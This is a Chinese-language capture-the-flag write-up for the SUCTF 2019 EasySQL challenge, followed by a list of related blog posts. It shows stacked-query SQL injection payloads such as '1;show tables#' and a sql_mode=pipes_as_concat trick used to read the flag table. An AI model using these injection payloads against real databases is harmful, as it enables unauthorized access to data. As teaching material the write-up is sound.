[SUCTF 2019]EasySQL 1

审题

判断SQL

知识点

SQL注入

解题

1. 堆叠查询

输入1'，1",1

发现1有回显

开始爆库

1;show databases#

然后，爆表

1;show tables#

看到flag，想爆列的，但是select啥的都没用。

看了WP后发现大佬们的思路太强了

1. 猜测sql语句为：select []||flag from Flag;

   直接输入*,1得到flag

   2. 输入1;set sql_mode=pipes_as_concat;select 1
      使|| 符号失效
      将sql_mode()函数设置成pipes_as_concat时，||的作用由or变为拼接字符串
      select 1;set sql_mode=pipes_as_concat;select 1||flag from Flag;
      拼接完：
      select 1
      set sql_mode=pipes_as_concat
      select 1||flag from Flag

参考博客

[SUCTF 2019]EasySQL 1 - Junglezt - 博客园

本栏目推荐文章
• P5321 [BJOI2019] 送别 题解--zhengjun
• [GXYCTF2019]BabySQli
• [Keyence2019] Paper Cutting
• Windows Server 2016 & 2019 工作站速配脚本
• 洛谷 P5359 [SDOI2019] 染色
• 板刷 2019~？的省选题
• [GXYCTF2019]BabyUpload
• [极客大挑战 2019]Secret File 1
• [SUCTF 2019]EasySQL 1
• [强网杯 2019]随便注 1

EasySQL SUCTF 2019easysql suctf 2019 easysql笔记suctf 2019 easysql 2019 checkin suctf 2019 pythonginx suctf 2019 web easysql1 easysql笔记2019 pythonginx suctf 2019 pythonginx buuctf suctf 2019 easysql easysql1